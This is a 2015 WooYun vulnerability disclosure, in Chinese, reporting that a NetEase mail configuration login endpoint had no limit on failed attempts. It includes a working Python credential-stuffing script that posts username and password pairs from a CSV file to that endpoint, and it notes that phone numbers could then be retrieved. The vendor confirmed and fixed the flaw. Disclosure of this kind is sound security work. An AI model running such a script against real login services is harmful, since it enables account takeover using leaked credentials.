缺陷编号:WooYun-2015-0124461
漏洞标题:网易通行证的一个无限撞库点有案例
相关厂商:网易
漏洞作者:reality0ne
提交时间:2015-07-04 12:03
公开时间:2015-08-21 10:26
漏洞类型:设计缺陷/逻辑错误
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
2015-07-04: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经确认,细节仅向厂商公开
2015-07-17: 细节向核心白帽子及相关领域专家公开
2015-07-27: 细节向普通白帽子公开
2015-08-06: 细节向实习白帽子公开
2015-08-21: 细节向公众公开
无意间发现的一个无限撞库点
https://ssl.mail.163.com/config/mobileconfig/index
在这里输入用户名和密码,错误多少次都是没有限制的。那么我们抓个包写个脚本实践下。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
# encoding=utf-8<br> import re<br> import json<br> import requestsdef parse_csv(filename):<br> with open(filename, 'r') as fp:<br> cr = re.compile(r'"(.*)","(.*)"')<br> result = cr.findall(fp.read())<br> return resultdef do_request():<br> accounts = parse_csv('126.csv')s = requests.Session()for account in accounts:<br> params = {<br> 'uid': account[0].lower(),<br> 'password': account[1],<br> 'mobile': '',<br> 'cal': 'false',<br> 'card': 'false',<br> 'basepath': 'https://ssl.mail.163.com/config/',<br> 'code': ''<br> }<br> resp = s.post('https://ssl.mail.163.com/config/mobileconfig/doconfig?m=url', data=params)<br> result = json.loads(resp.content)<br> print resp.content, accountif __name__ == '__main__':<br> do_request() |
随便找了几个帐号实践下,结果如下
带上 cookie 访问那个页面的话还能直接找到手机号。
加限制喽~
危害等级:中
漏洞Rank:6
确认时间:2015-07-0710:25
漏洞已修复,感谢您对网易的关注!
暂无
前排留名…海洋要火了⊙̆̈_⊙̆̈
要火?
这个老洞要活??
原文连接
的情况下转载,若非则不得使用我方内容。